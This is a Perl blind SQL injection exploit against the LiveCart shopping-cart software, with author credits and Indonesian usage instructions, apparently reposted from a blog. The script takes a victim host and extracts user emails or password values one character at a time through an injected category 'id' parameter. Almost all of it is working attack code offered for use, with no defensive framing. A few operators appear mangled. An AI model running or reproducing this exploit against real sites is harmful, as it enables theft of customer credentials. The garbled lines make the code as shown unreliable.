#!/usr/bin/perl -w
use LWP::UserAgent;
# scripts : livecart Remote Blind Sql Injection
# scripts site : http://www.livecart.com
#
# Discovered
# By : Rubai Mohamad
# site : http://se-code.blogspot.com
# forum : http://devilzcode.org/forum
# email : masrubai@gmail.com
#
# sample :
# http://demo.livecart.com
print "\r\n[+]----------------------[+]\r\n";
print "[+]Blind SQL injection [+]\r\n";
print "[+]Livecart [+]\r\n";
print "[+]code by banteng [+]\r\n";
print "[+]banteng[dot]cn [+]\r\n";
print "[+]----------------------[+]\n\r";
if (@ARGV < 3){
die "
Cara Mengunakan : perl $0 host option userid
Keterangan
host : http://victim.com atau victim.com
Option : pilih 1 untuk mencari email dan pilih 2 untuk mencari password
userid : Limit
Contoh : perl $0 http://victim.com 1 1
\n";}
$url = $ARGV[0];
$option = $ARGV[1];
$id = $ARGV[2];
if ($option eq 1){
syswrite(STDOUT, "email: ", 7);}
elsif ($option eq 2){
syswrite(STDOUT, "password: ", 10);}
for($i = 1; $i <= 32; $i++){
$f = 0;
$n = 32;
while(!$f && $n <= 57)
{
if(&blind($url, $option, $id, $i, $n, $id)){
$f = 1;
syswrite(STDOUT, chr($n), 1);
}
$n++;
}
if ($f==0){
$n = 97;
while(!$f && $n <= 122)
{
if(&blind($url, $option, $id, $i, $n, $id)){
$f = 1;
syswrite(STDOUT, chr($n), 1);
}
$n++;
}
}
}
print "\n[+]finish Execution Exploit\n";
sub blind {
my $site = $_[0];
my $op = $_[1];
my $id = $_[2];
my $i = $_[3];
my $n = $_[4];
my $r = $_[5];
if ($op eq 1){$klm = "email";}
elsif ($op eq 2){$klm = "password";}
$site = , s/^http:\/\///;
my $url = "http://"."$site"."/category?id=1"."%20AND%20SUBSTRING((SELECT%20"."$klm"."%20FROM%20"."User"."%20LIMIT%20"."$r".",1"."),"."$i".",1)=CHAR("."$n".")";
my $browser = &zero($url);
if ($browser ! , /Error Code 500/gi){
return 1;
}
else {
return 0;
}
}
sub zero($){
my $spy = $_[0];
my $ua = LWP::UserAgent->new;
$ua->agent('Mozilla/19.0 (compatible; MSIE 8.0; Windows NT 5.1)');
my $res = $ua->get($spy);
my @r = $res->content;
$page="@r";
return $page;}
Comments
Post a Comment